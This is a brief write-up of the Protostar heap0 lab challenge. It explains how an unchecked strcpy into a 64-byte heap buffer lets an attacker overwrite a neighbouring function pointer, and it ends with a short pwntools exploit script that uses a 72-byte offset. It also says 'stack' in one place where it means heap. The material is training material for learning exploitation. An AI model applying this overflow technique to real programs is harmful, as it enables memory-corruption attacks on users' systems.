This exercise provides the most basic of heap overflows. You can see in the source code of heap0 that there is a structure called fp which contains a function pointer also named fp.

The structure of datatype fp is dynamically allocated using malloc and hence resides on the heap.

The structure of datatype data is created before that and also resides on the heap at a lower memory address than that of fp.

The object d of type data contains a buffer name which stores upto 64 characters. The value of argv[1] is copied into name using strcpy without any bounds checking which is our vulnerability.

Running the program once would give you the address of d and f on the stack and you can calculate the offset between the two addresses.

What we need to do is to overwrite the function pointer fp of f and make it point to winner() instead of nowinner().

This is to be done by overflowing the buffer name.

The offset is 72 bytes and the address of winner is 0x80484ad

So the final exploit as a python script will be:

1. from pwn import *

2. context.binary="heap0"

3. junk="A"*72

4. addr=pack(0x80484ad)

5. p=process([context.binary.path,junk+addr])

6. msg=p.recvall()

7. print msg

#heap #protostar #binary